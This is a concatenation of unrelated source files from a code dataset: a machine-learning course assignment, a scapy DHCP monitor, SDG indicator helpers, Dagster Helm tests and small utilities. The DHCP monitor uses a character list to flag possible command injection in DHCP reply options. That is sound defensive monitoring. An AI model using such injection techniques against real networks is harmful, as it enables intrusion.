features = util.Counter()\n \"*** YOUR CODE HERE ***\"\n \"\"\"\n Initialize values for the current state (referred to as old_state) and the\n successor state (referred to as state), because the successor is used for the\n majority of features, along with pacman's location and the food count in the\n successor state\n \"\"\"\n old_state = state\n state = state.generate_pacman_successor(action)\n pacman_location = state.get_pacman_position()\n new_food = state.get_num_food()\n \n \"\"\"\n Format for extracting each feature:\n get the locations of each feature (capsules, food, ghosts) and the ghost scared state,\n initialise the distance to the nearest instance of each feature to zero,\n then, if the successor state contains any instances of that feature,\n compute the closest distance as the minimum manhattan distance\n from pacman's location to the feature's location.\n Each feature is then the reciprocal of that distance if it exists,\n otherwise it stays zero\n \"\"\"\n food_locations = state.get_food().as_list()\n nearest_food_dist = 0\n if food_locations:\n nearest_food_dist = min([manhattan_distance(pacman_location, food) for food in food_locations])\n nearest_food_dist = 1.0/nearest_food_dist if nearest_food_dist else nearest_food_dist\n \n capsule_locations = state.get_capsules()\n nearest_capsules_dist = 0\n if capsule_locations:\n nearest_capsules_dist = min([manhattan_distance(pacman_location, capsules) for capsules in capsule_locations])\n nearest_capsules_dist = 1.0/nearest_capsules_dist if nearest_capsules_dist else nearest_capsules_dist\n \n old_ghost_locations = old_state.get_ghost_positions()\n old_nearest_ghost_dist = 0\n if old_ghost_locations:\n old_nearest_ghost_dist = min(manhattan_distance(pacman_location, location) for location in old_ghost_locations)\n old_nearest_ghost_dist = 1.0/old_nearest_ghost_dist if old_nearest_ghost_dist else old_nearest_ghost_dist\n \n ghost_locations = state.get_ghost_positions()\n nearest_ghost_dist = 0\n if ghost_locations:\n nearest_ghost_dist = min(manhattan_distance(pacman_location, location) for location in ghost_locations)\n nearest_ghost_dist = 1.0/nearest_ghost_dist if nearest_ghost_dist else nearest_ghost_dist\n \n new_ghost_states = state.get_ghost_states()\n new_scared_times = [ghost_state.scared_timer for ghost_state in new_ghost_states]\n nearest_scared_ghost_dist = 0\n if new_scared_times:\n scared_ghost_locs = state.get_ghost_positions()\n if scared_ghost_locs:\n 
nearest_scared_ghost_dist = min(manhattan_distance(pacman_location, location) for location in scared_ghost_locs)\n nearest_scared_ghost_dist = 1.0/nearest_scared_ghost_dist if nearest_scared_ghost_dist else nearest_scared_ghost_dist\n \n \"\"\"\n set all of the features in the feature vector, which is just the\n value of each feature, except for the difference between the old and new\n closest-ghost distances, which is only set when both of those values exist\n \"\"\"\n features['new_num_food'] = new_food\n features['nearest_capsules_dist'] = nearest_capsules_dist\n features['nearest_food_dist'] = nearest_food_dist\n features['nearest_ghost_dist'] = nearest_ghost_dist\n features['old_nearest_ghost_dist'] = old_nearest_ghost_dist\n features['nearest_scared_ghost_dist'] = nearest_scared_ghost_dist\n if nearest_ghost_dist and old_nearest_ghost_dist:\n features[\"closest_ghost_dist_difference\"] = old_nearest_ghost_dist - nearest_ghost_dist\n \n return features\n\n\ndef contest_feature_extractor_digit(datum):\n \"\"\"\n Specify features to use for the minicontest\n \"\"\"\n features = basic_feature_extractor_digit(datum)\n return features\n\ndef enhanced_feature_extractor_face(datum):\n \"\"\"\n Your feature extraction playground for faces.\n It is your choice to modify this.\n \"\"\"\n features = basic_feature_extractor_face(datum)\n return features\n\ndef analysis(classifier, guesses, test_labels, test_data, raw_test_data, print_image):\n \"\"\"\n This function is called after learning.\n Include any code that you want here to help you analyze your results.\n\n Use the print_image(<list of pixels>) function to visualize features.\n\n An example of use has been given to you.\n\n - classifier is the trained classifier\n - guesses is the list of labels predicted by your classifier on the test set\n - test_labels is the list of true labels\n - test_data is the list of test datapoints (as util.Counter of features)\n - raw_test_data is the list of test datapoints (as samples.Datum)\n - print_image is a method to visualize the features\n (see its use in the odds ratio part in run_classifier method)\n\n This code won't be evaluated. It is for your own optional use\n (and you can modify the signature if you want).\n \"\"\"\n\n # Put any code here...\n # Example of use:\n # for i in range(len(guesses)):\n # prediction = guesses[i]\n # truth = test_labels[i]\n # if (prediction != truth):\n # print(\"===================================\")\n # print(\"Mistake on example %d\" % i)\n # print(\"Predicted %d; truth is %d\" % (prediction, truth))\n # print(\"Image: \")\n # print(raw_test_data[i])\n # break\n\n\n## =====================\n## You don't have to modify any code below.\n## =====================\n\n\nclass ImagePrinter:\n def __init__(self, width, height):\n self.width = width\n self.height = height\n\n def print_image(self, pixels, ax=None):\n \"\"\"\n Prints a Datum object that contains all pixels in the\n provided list of pixels. 
This will serve as a helper function\n to the analysis function you write.\n\n Pixels should take the form\n [(2,2), (2, 3), ...]\n where each tuple represents a pixel.\n \"\"\"\n image = samples.Datum(None,self.width,self.height)\n for pix in pixels:\n try:\n # This is so that new features that you could define which\n # which are not of the form of (x,y) will not break\n # this image printer...\n x,y = pix\n image.pixels[x][y] = 2\n except:\n print(\"new features:\", pix)\n continue\n \n if ax: \n pixels = np.asarray(np.asarray(image.pixels).T)\n im = np.zeros((pixels.shape[0], pixels.shape[1],3))\n im[pixels>=1] = [0,1,0]\n im[pixels<1] = [0,0,0]\n ax.imshow(im, interpolation='nearest')\n else :\n print(image)\n\ndef default(str):\n return str + ' [Default: %default]'\n\nUSAGE_STRING = \"\"\"\n USAGE: python data_classifier.py <options>\n EXAMPLES: (1) python data_classifier.py\n - trains the default most_frequent classifier on the digit dataset\n using the default 100 training examples and\n then test the classifier on test data\n (2) python data_classifier.py -c naive_bayes -d digits -t 1000 -f -o -1 3 -2 6 -k 2.5\n - would run the naive Bayes classifier on 1000 training examples\n using the enhanced_feature_extractor_digits function to get the features\n on the faces dataset, would use the smoothing parameter equals to 2.5, would\n test the classifier on the test data and performs an odd ratio analysis\n with label1=3 vs. label2=6\n \"\"\"\n\ndef learning_rate_callback(option, opt, value, parser):\n setattr(parser.values, option.dest, [float(s) for s in value.split(',')])\n\n\ndef read_command( argv ):\n \"Processes the command used to run from the command line.\"\n from optparse import OptionParser\n parser = OptionParser(USAGE_STRING)\n\n parser.add_option('-c', '--classifier', help=default('The type of classifier'), choices=['most_frequent', 'nb', 'naive_bayes', 'perceptron', 'perceptron_numpy', 'logistic', 'minicontest'], default='most_frequent')\n parser.add_option('-d', '--data', help=default('Dataset to use'), choices=['digits', 'faces', 'pacman'], default='digits')\n parser.add_option('-t', '--training', help=default('The size of the training set'), default=100, type=\"int\")\n parser.add_option('-f', '--features', help=default('Whether to use enhanced features'), default=False, action=\"store_true\")\n parser.add_option('-o', '--odds', help=default('Whether to compute odds ratios'), default=False, action=\"store_true\")\n parser.add_option('-1', '--label1', help=default(\"First label in an odds ratio comparison\"), default=0, type=\"int\")\n parser.add_option('-2', '--label2', help=default(\"Second label in an odds ratio comparison\"), default=1, type=\"int\")\n parser.add_option('-w', '--weights', help=default('Whether to print weights'), default=False, action=\"store_true\")\n parser.add_option('-n', '--num_weights', help=default(\"Num Weights to Print (when --weights enabled), default: 100\"), default=100, type=\"int\")\n parser.add_option('-k', '--smoothing', help=default(\"Smoothing parameter (ignored when using --autotune)\"), type=\"float\", default=2.0)\n parser.add_option('-a', '--autotune', help=default(\"Whether to automatically tune hyperparameters\"), default=False, action=\"store_true\")\n parser.add_option('-i', '--iterations', help=default(\"Maximum iterations to run training\"), default=3, type=\"int\")\n parser.add_option('-s', '--test', help=default(\"Amount of test data to use\"), default=TEST_SET_SIZE, type=\"int\")\n parser.add_option('-g', 
'--agent_to_clone', help=default(\"Pacman agent to copy\"), default=None, type=\"str\")\n parser.add_option('-l', '--learning_rates', help=default(\"Learning rates to use for gradient descent, can be a comma separated list or single value\"), \n default=[0.2], type=\"str\", action='callback', callback=learning_rate_callback)\n\n\n options, otherjunk = parser.parse_args(argv)\n if len(otherjunk) != 0: raise Exception('Command line input not understood: ' + str(otherjunk))\n args = {}\n\n # Set up variables according to the command line input.\n print(\"Doing classification\")\n print(\"--------------------\")\n print(\"data:\\t\\t\" + options.data)\n print(\"classifier:\\t\\t\" + options.classifier)\n if not options.classifier == 'minicontest':\n print(\"using enhanced features?:\\t\" + str(options.features))\n else:\n print(\"using minicontest feature extractor\")\n print(\"training set size:\\t\" + str(options.training))\n if(options.data==\"digits\"):\n print_image = ImagePrinter(DIGIT_DATUM_WIDTH, DIGIT_DATUM_HEIGHT).print_image\n if (options.features):\n feature_function = enhanced_feature_extractor_digit\n else:\n feature_function = basic_feature_extractor_digit\n if (options.classifier == 'minicontest'):\n feature_function = contest_feature_extractor_digit\n elif(options.data==\"faces\"):\n print_image = ImagePrinter(FACE_DATUM_WIDTH, FACE_DATUM_HEIGHT).print_image\n if (options.features):\n feature_function = enhanced_feature_extractor_face\n else:\n feature_function = basic_feature_extractor_face\n elif(options.data==\"pacman\"):\n print_image = None\n if (options.features):\n feature_function = enhanced_feature_extractor_pacman\n else:\n feature_function = basic_feature_extractor_pacman\n else:\n print(\"Unknown dataset\", options.data)\n print(USAGE_STRING)\n sys.exit(2)\n\n if(options.data==\"digits\"):\n legal_labels = list(range(10))\n else:\n legal_labels = ['Stop', 'West', 'East', 'North', 'South']\n\n if options.training <= 0:\n print(\"Training set size should be a positive integer (you provided: %d)\" % options.training)\n print(USAGE_STRING)\n sys.exit(2)\n\n if options.smoothing <= 0:\n print(\"Please provide a positive number for smoothing (you provided: %f)\" % options.smoothing)\n print(USAGE_STRING)\n sys.exit(2)\n\n if options.odds:\n if options.label1 not in legal_labels or options.label2 not in legal_labels:\n print(\"Didn't provide a legal labels for the odds ratio: (%d,%d)\" % (options.label1, options.label2))\n print(USAGE_STRING)\n sys.exit(2)\n\n if(options.classifier == \"most_frequent\"):\n classifier = most_frequent.MostFrequentClassifier(legal_labels)\n elif(options.classifier == \"naive_bayes\" or options.classifier == \"nb\"):\n classifier = naive_bayes.NaiveBayesClassifier(legal_labels)\n classifier.set_smoothing(options.smoothing)\n if (options.autotune):\n print(\"using automatic tuning for naivebayes\")\n classifier.automatic_tuning = True\n else:\n print(\"using smoothing parameter k=%f for naivebayes\" % options.smoothing)\n elif(options.classifier == \"perceptron\"):\n if options.data != 'pacman':\n classifier = perceptron.PerceptronClassifier(legal_labels,options.iterations)\n else:\n classifier = perceptron_pacman.PerceptronClassifierPacman(legal_labels,options.iterations)\n elif(options.classifier == \"perceptron_numpy\"):\n if options.data != 'pacman':\n classifier = perceptron_numpy.OptimizedPerceptronClassifier(legal_labels,options.iterations)\n elif(options.classifier == \"logistic\"):\n if options.data != 'pacman':\n classifier = 
logistic.SoftmaxClassifier(legal_labels,options.iterations)\n classifier.learning_rates = options.learning_rates\n\n elif(options.classifier == 'minicontest'):\n import minicontest\n classifier = minicontest.contest_classifier(legal_labels)\n else:\n print(\"Unknown classifier:\", options.classifier)\n print(USAGE_STRING)\n\n sys.exit(2)\n\n args['agent_to_clone'] = options.agent_to_clone\n\n args['classifier'] = classifier\n args['feature_function'] = feature_function\n args['print_image'] = print_image\n\n return args, options\n\n# Dictionary containing full path to .pkl file that contains the agent's training, validation, and testing data.\nMAP_AGENT_TO_PATH_OF_SAVED_GAMES = {\n 'FoodAgent': ('pacmandata/food_training.pkl','pacmandata/food_validation.pkl','pacmandata/food_test.pkl' ),\n 'StopAgent': ('pacmandata/stop_training.pkl','pacmandata/stop_validation.pkl','pacmandata/stop_test.pkl' ),\n 'SuicideAgent': ('pacmandata/suicide_training.pkl','pacmandata/suicide_validation.pkl','pacmandata/suicide_test.pkl' ),\n 'GoodReflexAgent': ('pacmandata/good_reflex_training.pkl','pacmandata/good_reflex_validation.pkl','pacmandata/good_reflex_test.pkl' ),\n 'ContestAgent': ('pacmandata/contest_training.pkl','pacmandata/contest_validation.pkl', 'pacmandata/contest_test.pkl' )\n}\n# Main harness code\n\n\n\ndef run_classifier(args, options):\n feature_function = args['feature_function']\n classifier = args['classifier']\n print_image = args['print_image']\n \n # Load data\n num_training = options.training\n num_test = options.test\n\n if(options.data==\"pacman\"):\n agent_to_clone = args.get('agent_to_clone', None)\n training_data, validation_data, test_data = MAP_AGENT_TO_PATH_OF_SAVED_GAMES.get(agent_to_clone, (None, None, None))\n training_data = training_data or args.get('training_data', False) or MAP_AGENT_TO_PATH_OF_SAVED_GAMES['ContestAgent'][0]\n validation_data = validation_data or args.get('validation_data', False) or MAP_AGENT_TO_PATH_OF_SAVED_GAMES['ContestAgent'][1]\n test_data = test_data or MAP_AGENT_TO_PATH_OF_SAVED_GAMES['ContestAgent'][2]\n raw_training_data, training_labels = samples.load_pacman_data(training_data, num_training)\n raw_validation_data, validation_labels = samples.load_pacman_data(validation_data, num_test)\n raw_test_data, test_labels = samples.load_pacman_data(test_data, num_test)\n else:\n raw_training_data = samples.load_data_file(\"digitdata/trainingimages\", num_training,DIGIT_DATUM_WIDTH,DIGIT_DATUM_HEIGHT)\n training_labels = samples.load_labels_file(\"digitdata/traininglabels\", num_training)\n raw_validation_data = samples.load_data_file(\"digitdata/validationimages\", num_test,DIGIT_DATUM_WIDTH,DIGIT_DATUM_HEIGHT)\n validation_labels = samples.load_labels_file(\"digitdata/validationlabels\", num_test)\n raw_test_data = samples.load_data_file(\"digitdata/testimages\", num_test,DIGIT_DATUM_WIDTH,DIGIT_DATUM_HEIGHT)\n test_labels = samples.load_labels_file(\"digitdata/testlabels\", num_test)\n\n\n # Extract features\n print(\"Extracting features...\")\n training_data = list(map(feature_function, raw_training_data))\n validation_data = list(map(feature_function, raw_validation_data))\n test_data = list(map(feature_function, raw_test_data))\n\n # Conduct training and testing\n print(\"Training...\")\n classifier.train(training_data, training_labels, validation_data, validation_labels)\n print(\"Validating...\")\n guesses = classifier.classify(validation_data)\n correct = [guesses[i] == validation_labels[i] for i in 
range(len(validation_labels))].count(True)\n print(str(correct), (\"correct out of \" + str(len(validation_labels)) + \" (%.1f%%).\") % (100.0 * correct / len(validation_labels)))\n print(\"Testing...\")\n guesses = classifier.classify(test_data)\n correct = [guesses[i] == test_labels[i] for i in range(len(test_labels))].count(True)\n print(str(correct), (\"correct out of \" + str(len(test_labels)) + \" (%.1f%%).\") % (100.0 * correct / len(test_labels)))\n analysis(classifier, guesses, test_labels, test_data, raw_test_data, print_image)\n\n # do odds ratio computation if specified at command line\n if((options.odds) & (options.classifier == \"naive_bayes\" or (options.classifier == \"nb\")) ):\n label1, label2 = options.label1, options.label2\n features_odds = classifier.find_high_odds_features(label1,label2)\n if(options.classifier == \"naive_bayes\" or options.classifier == \"nb\"):\n string3 = \"=== Features with highest odd ratio of label %d over label %d ===\" % (label1, label2)\n else:\n string3 = \"=== Features for which weight(label %d)-weight(label %d) is biggest ===\" % (label1, label2)\n\n print(string3)\n print_image(features_odds)\n\n\n if((options.weights) & ((options.classifier in [\"perceptron_numpy\", \"logistic\"]))):\n\n for i,l in enumerate(classifier.legal_labels):\n features_weights = classifier.find_high_weight_features(l, options.num_weights)\n print((\"=== Plotting Features with high weight for label %d ===\"%l))\n ax = plt.subplot(1, len(classifier.legal_labels), 1+i)\n print_image(features_weights, ax)\n plt.show()\n\nif __name__ == '__main__':\n # Read input\n args, options = read_command( sys.argv[1:] )\n # Run classifier\n run_classifier(args, options)\n","sub_path":"CSI-480-01_Artificial Intelligence/02_ Innov. IV_ Adv. 
Topics - AI - Fall 2017 (2017FA)/Supervised Learning Programming Assignment/data_classifier.py","file_name":"data_classifier.py","file_ext":"py","file_size_in_byte":24852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"410409160","text":"#!/usr/bin/env python\n\"\"\"\nUsage: sudo python dhcp_mon.py\n\nThis script monitors DHCP frames and highlights potentially malicious characters\ncontained within DHCP reply options fields\n\"\"\"\n\nfrom __future__ import print_function, absolute_import, unicode_literals\nfrom scapy.all import *\nimport signal\nimport sys\n__author__ = 'themson mester'\n\n\nINTERFACE = b'eth0'\nDHCPSRVR_PACKETS = (2, 5)\nBOLD_RED = '\\033[1;91m'\nEND = '\\033[0m'\nWARNCHARS = set('(){}')\n\n\ndef handler(signum, frame):\n \"\"\"Gracefully catch sigint\"\"\"\n print(\"\\nInterrupt caught: shutting down\")\n sys.exit(signum)\n\n\ndef print_frame(frame):\n \"\"\" Parse and print DHCP Frames\n\n parse sniffed DHCP frames\n print summary of client requests\n print full options of server replies\n Highlight potentially malicious chars\n\n :param frame:\n \"\"\"\n if 'DHCP' in frame:\n options = frame['DHCP options'].options\n type_value = options[0][1]\n type_name = scapy.layers.dhcp.DHCPTypes[type_value]\n print(\"\\nFRAME: {}\".format(frame.summary()))\n print(\"TYPE: DHCP-{}\".format(type_name))\n if type_value in DHCPSRVR_PACKETS:\n print(\"OPTIONS:\")\n for option in options:\n warn = False\n if type(option) is tuple:\n for arg in option:\n if any(char in WARNCHARS for char in str(arg)):\n warn = True\n if warn is True:\n print(BOLD_RED + ' {}'.format(option) + END)\n else:\n print(' {}'.format(option))\n\n if option == 'end': # Skip padding\n return\n\n\ndef sniffer():\n \"\"\"Instantiate scapy sniffer with DHCP filters\"\"\"\n try:\n sniff(iface=INTERFACE, prn=print_frame, filter='udp and (port bootps or bootps)', store=0)\n except Exception as _e:\n print(\"ERROR - sniffer(): {}\".format(_e.args))\n\n\ndef main():\n signal.signal(signal.SIGINT, handler)\n print(\"\\nLaunching DHCP monitor.\")\n print(\"Ctrl+C to exit\")\n sniffer()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"dhcp_mon.py","file_name":"dhcp_mon.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"457643059","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 20 19:53:30 2018\r\n\r\n@author: bimta\r\n\"\"\"\r\n\r\nimport pyperclip\r\nimport re\r\nfrom matplotlib_venn import venn2, venn3\r\n\r\n#Indicators that repeat:\r\n \r\nrepeaters = {\"8.4.1/12.2.1\" : [\"8.4.1\", \"12.2.1\"],\r\n \"8.4.2/12.2.2\" : [\"8.4.2\", \"12.2.2\"],\r\n \"10.3.1/16.b.1\" : [\"10.3.1\", \"16.b.1\"],\r\n \"10.6.1/16.8.1\" : [\"10.6.1\", \"16.8.1\"],\r\n \"15.7.1/15.c.1\" : [\"15.7.1\", \"15.c.1\"],\r\n \"15.a.1/15.b.1\" : [\"15.a.1\", \"15.b.1\"],\r\n \"1.5.1/11.5.1/13.1.1\" : [\"1.5.1\", \"11.5.1\", \"13.1.1\"],\r\n \"1.5.3/11.b.1/13.1.2\" : [\"1.5.3\", \"11.b.1\", \"13.1.2\"],\r\n \"1.5.4/11.b.2/13.1.3\" : [\"1.5.4\", \"11.b.2\", \"13.1.3\"]}\r\n\r\n#Single mentions of these indicators are to be exchanged for their full name\r\ndef rm_repeating(my_list):\r\n new_list = []\r\n for e in my_list:\r\n for k, v in repeaters.items():\r\n if e in v: \r\n e = str(k)\r\n new_list.append(e)\r\n else:\r\n new_list.append(e)\r\n new_list = list(set(new_list))\r\n return new_list \r\n\r\n#Pick up any list of indicators from Excel:\r\ndef excel_paste():\r\n 
workplans_excel_pasted = pyperclip.paste()\r\n workplans_excel_cleaned = workplans_excel_pasted.replace(\"\\r\", \"\")\r\n workplans_excel = workplans_excel_cleaned.split(\"\\n\")\r\n workplans_excel.pop(-1)\r\n return workplans_excel\r\n\r\n#make sure that there are no additional thingies in list\r\ndef list_cleaner(my_list):\r\n my_new_list = []\r\n for entry in my_list:\r\n new_entry = re.sub('[^A-Za-z0-9./]+', '', entry)\r\n my_new_list.append(new_entry)\r\n return my_new_list\r\n\r\n#check overlaps between two lists\r\ndef overlap_check2(list1, list2, no_repeating = False):\r\n if no_repeating == False:\r\n list1 = list_cleaner(list1)\r\n list2 = list_cleaner(list2)\r\n \r\n if no_repeating == True :\r\n list1 = list_cleaner(rm_repeating(list1))\r\n list2 = list_cleaner(rm_repeating(list2))\r\n \r\n set1 = set(list1)\r\n set2 = set(list2)\r\n \r\n #'\\n'.join([str(myelement) for myelement in list(set1.difference(set2))])\r\n \r\n print(\"Only in 1st set:\\n\", ', '.join(list(set1.difference(set2))))\r\n print(\"Only in 2nd set: \\n\", ', '.join(list(set2.difference(set1))))\r\n print(\"In the intersection: \\n\", ', '.join(list(set1.intersection(set2))))\r\n \r\n venn2([set1, set2])\r\n\r\n#check overlaps between three lists \r\ndef overlap_check3(list1, list2, list3):\r\n list1 = list_cleaner(list1)\r\n list2 = list_cleaner(list2)\r\n list3 = list_cleaner(list3)\r\n set1 = set(list1)\r\n set2 = set(list2)\r\n set3 = set(list3)\r\n \r\n print(\"Only in 1st set: \", ', '.join(list(set1.difference(set2|set3))))\r\n print(\"Only in 2nd set: \", ', '.join(list(set2.difference(set1|set3))))\r\n print(\"Only in 3nd set: \", ', '.join(list(set3.difference(set1|set2))))\r\n \r\n venn3([set1, set2, set3])\r\n\r\n# ok great the two that are missing are actually 8.4.1 and 10.3.1 which double with 12.2.1 and 16.b.1\r\n\r\n\r\n#cleaning the list of indicators of those with \"a\" \"b\" \"x\" versions (only needed once)\r\ndef list_cleaner_metadata(my_list):\r\n all_indicators_cleaned = []\r\n for entry in my_list:\r\n if entry[-1].isalpha():\r\n entry_cleaned = entry[:-1]\r\n all_indicators_cleaned.append(entry_cleaned)\r\n else:\r\n all_indicators_cleaned.append(entry)\r\n #changing to set to remove duplicates\r\n my_set = set(all_indicators_cleaned)\r\n all_indicators_cleaned = list(my_set)\r\n return all_indicators_cleaned\r\n \r\n \r\ndef sort_indicators(my_list):\r\n my_list.sort(key= lambda key: int(key.split('.')[2]))\r\n my_list.sort(key= lambda key: int(key.split('.')[1].replace('a','90').replace('b','91').replace('c','92')))\r\n my_list.sort(key= lambda key: int(key.split('.')[0]))\r\n return my_list\r\n\r\n\r\n\r\n\r\n","sub_path":"helper_tools.py","file_name":"helper_tools.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"325515088","text":"import pytest\nimport yaml\nfrom dagster_aws.s3.compute_log_manager import S3ComputeLogManager\nfrom dagster_azure.blob.compute_log_manager import AzureBlobComputeLogManager\nfrom dagster_gcp.gcs.compute_log_manager import GCSComputeLogManager\nfrom kubernetes.client import models\nfrom schema.charts.dagster.subschema.compute_log_manager import (\n AzureBlobComputeLogManager as AzureBlobComputeLogManagerModel,\n)\nfrom schema.charts.dagster.subschema.compute_log_manager import (\n GCSComputeLogManager as GCSComputeLogManagerModel,\n)\nfrom schema.charts.dagster.subschema.compute_log_manager import (\n S3ComputeLogManager as 
S3ComputeLogManagerModel,\n)\nfrom schema.charts.dagster.subschema.daemon import Daemon, QueuedRunCoordinator\nfrom schema.charts.dagster.subschema.postgresql import PostgreSQL, Service\nfrom schema.charts.dagster.values import DagsterHelmValues\nfrom schema.utils.helm_template import HelmTemplate\n\n\ndef to_camel_case(s: str) -> str:\n components = s.split(\"_\")\n return components[0] + \"\".join(x.title() for x in components[1:])\n\n\n@pytest.fixture(name=\"template\")\ndef helm_template() -> HelmTemplate:\n return HelmTemplate(\n helm_dir_path=\"helm/dagster\",\n subchart_paths=[\"charts/dagster-user-deployments\"],\n output=\"templates/configmap-instance.yaml\",\n model=models.V1ConfigMap,\n )\n\n\n@pytest.mark.parametrize(\"storage\", [\"schedule_storage\", \"run_storage\", \"event_log_storage\"])\ndef test_storage_postgres_db_config(template: HelmTemplate, storage: str):\n postgresql_username = \"username\"\n postgresql_host = \"1.1.1.1\"\n postgresql_database = \"database\"\n postgresql_params = {\n \"connect_timeout\": 10,\n \"application_name\": \"myapp\",\n \"options\": \"-c synchronous_commit=off\",\n }\n postgresql_port = 8080\n helm_values = DagsterHelmValues.construct(\n postgresql=PostgreSQL.construct(\n postgresqlUsername=postgresql_username,\n postgresqlHost=postgresql_host,\n postgresqlDatabase=postgresql_database,\n postgresqlParams=postgresql_params,\n service=Service(port=postgresql_port),\n )\n )\n\n configmaps = template.render(helm_values)\n\n assert len(configmaps) == 1\n\n instance = yaml.full_load(configmaps[0].data[\"dagster.yaml\"])\n\n assert instance[storage]\n\n postgres_db = instance[storage][\"config\"][\"postgres_db\"]\n\n assert postgres_db[\"username\"] == postgresql_username\n assert postgres_db[\"password\"] == {\"env\": \"DAGSTER_PG_PASSWORD\"}\n assert postgres_db[\"hostname\"] == postgresql_host\n assert postgres_db[\"db_name\"] == postgresql_database\n assert postgres_db[\"port\"] == postgresql_port\n assert postgres_db[\"params\"] == postgresql_params\n\n\n@pytest.mark.parametrize(\"enabled\", [True, False])\ndef test_run_coordinator_config(template: HelmTemplate, enabled: bool):\n module_name = \"dagster.core.run_coordinator\"\n class_name = \"QueuedRunCoordinator\"\n\n helm_values = DagsterHelmValues.construct(\n dagsterDaemon=Daemon.construct(\n queuedRunCoordinator=QueuedRunCoordinator.construct(\n enabled=enabled, module=module_name, class_name=class_name\n )\n )\n )\n configmaps = template.render(helm_values)\n assert len(configmaps) == 1\n\n instance = yaml.full_load(configmaps[0].data[\"dagster.yaml\"])\n\n assert (\"run_coordinator\" in instance) == enabled\n if enabled:\n assert instance[\"run_coordinator\"][\"module\"] == module_name\n assert instance[\"run_coordinator\"][\"class\"] == class_name\n\n\n@pytest.mark.parametrize(\n argnames=[\"json_schema_model\", \"compute_log_manager_class\"],\n argvalues=[\n (AzureBlobComputeLogManagerModel, AzureBlobComputeLogManager),\n (GCSComputeLogManagerModel, GCSComputeLogManager),\n (S3ComputeLogManagerModel, S3ComputeLogManager),\n ],\n)\ndef test_compute_log_manager_has_schema(json_schema_model, compute_log_manager_class):\n json_schema_fields = json_schema_model.schema()[\"properties\"].keys()\n compute_log_manager_fields = set(\n map(to_camel_case, compute_log_manager_class.config_type().keys())\n )\n\n assert json_schema_fields == 
compute_log_manager_fields\n","sub_path":"helm/dagster/schema/schema_tests/test_instance.py","file_name":"test_instance.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"67985620","text":"import os\nfrom argparse import ArgumentParser\n\nimport atexit\nimport time\n\n\ndef convert(bin):\n \"\"\"\n 00010000 -> 00000001\n \"\"\"\n new_bin = ['0'] * 8\n # 10000000 -> 01000000\n new_bin[1] = bin[0]\n\n # 01000000 -> 00000100\n new_bin[5] = bin[1]\n\n # 00100000 -> 00000010\n new_bin[6] = bin[2]\n\n # 00010000 -> 00000001\n new_bin[7] = bin[3]\n\n # 00001000 -> 00001000\n new_bin[4] = bin[4]\n\n # 00000100 -> 00010000\n new_bin[3] = bin[5]\n\n # 00000010 -> 00100000\n new_bin[2] = bin[6]\n\n # 00000001 -> 10000000\n new_bin[0] = bin[7]\n\n return chr(int(''.join(new_bin), 2) + 0x2800)\n\n\ndef rotate(s, left=False):\n try:\n while True:\n print(convert(s), end='\\r')\n s = rotate_left(s) if left else rotate_right(s)\n time.sleep(0.5)\n except KeyboardInterrupt:\n pass\n\n\ndef rotate_left(s):\n return s[1:] + s[0]\n\n\ndef rotate_right(s):\n return s[-1] + s[:-1]\n\n\ndef print_dots(s, left=False):\n for i in range(8):\n print(convert(s), end='')\n s = rotate_left(s) if left else rotate_right(s)\n\n\nos.system('setterm -cursor off')\n\natexit.register(lambda: os.system('setterm -cursor on'))\nparser = ArgumentParser()\nparser.add_argument('bin', nargs='*')\nparser.add_argument('--rotate', nargs=1)\nparser.add_argument('--print', nargs=1)\nparser.add_argument('--left', action='store_true')\n\nargs = parser.parse_args()\nif args.rotate:\n rotate(args.rotate[0], args.left)\nelif args.print:\n print_dots(args.print[0], args.left)\nelse:\n for arg in args.bin:\n print(convert(arg))\n","sub_path":"scripts/loading_dots.py","file_name":"loading_dots.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"486943765","text":"import shutil\nimport tkinter as tk\nfrom pathlib import Path\nfrom tkinter.filedialog import askdirectory\n\ndef get_formatted_extension(from_extension, remediate=False):\n '''\n -- Purpose --\n Returns an extension that:\n 1. has a period in the front\n 2. Optional: is lower-case\n 3. 
Optional: return jpeg as jpg and tiff as tif\n\n -- Arguments --\n from_extension: type=string; file extension with or without a '.'\n\n -- Returns --\n formatted_extension: type=string; formatted extension\n '''\n # make sure there's a period at the front of the extension\n if from_extension.startswith('.'): # do nothing\n formatted_extension = from_extension\n else: # add a period\n formatted_extension = f'.{from_extension}'\n\n # make it lower-case\n if remediate:\n formatted_extension = formatted_extension.lower()\n # hard-coded alterations for jpeg and tiff\n if formatted_extension == '.jpeg':\n formatted_extension = '.jpg'\n elif formatted_extension == '.tiff':\n formatted_extension = '.tif'\n\n return formatted_extension\n\nclass ContinuingPublications_Volume:\n '''Common base class for Continuing Publications'''\n\n def __init__(self, directory):\n self.directory_path = Path(directory).resolve()\n\n\n def backup_volume(self):\n '''\n -- Purpose --\n Copy all files in directory to backup directory with name: <directory>_backup\n\n -- Arguments --\n None\n\n -- Returns --\n backup_directory_path: type=Path-like object; returns absolute path to backup directory\n '''\n backup_directory_name = f'{self.directory_path.name}_backup'\n backup_directory_path = self.directory_path.parents[0].joinpath(backup_directory_name)\n\n if backup_directory_path.exists(): # shutil.copytree requires directory to NOT exist\n # shutil.rmtree(backup_directory_path)\n print(f'Backup already exists at {backup_directory_path}')\n else:\n print(f'Backing up {self.directory_path.name} . . .')\n shutil.copytree(self.directory_path, backup_directory_path)\n\n if backup_directory_path.exists():\n print('Backup created')\n return backup_directory_path.resolve()\n\n\n def create_islandora_ingest_directory(self):\n '''\n -- Purpose --\n Create Islandora ingest directory with TIFF in nested structure\n\n -- Arguments --\n None\n\n -- Returns --\n ingest_directory_path: type=Path-like object; Path to the directory for ingest\n '''\n import datetime\n\n # set ingest stub to add to directory name\n ingest_stub = 'ForIslandoraIngest_Created'\n # get today's date in YYYY-MM-DD format and add to ingest stub\n todays_date = 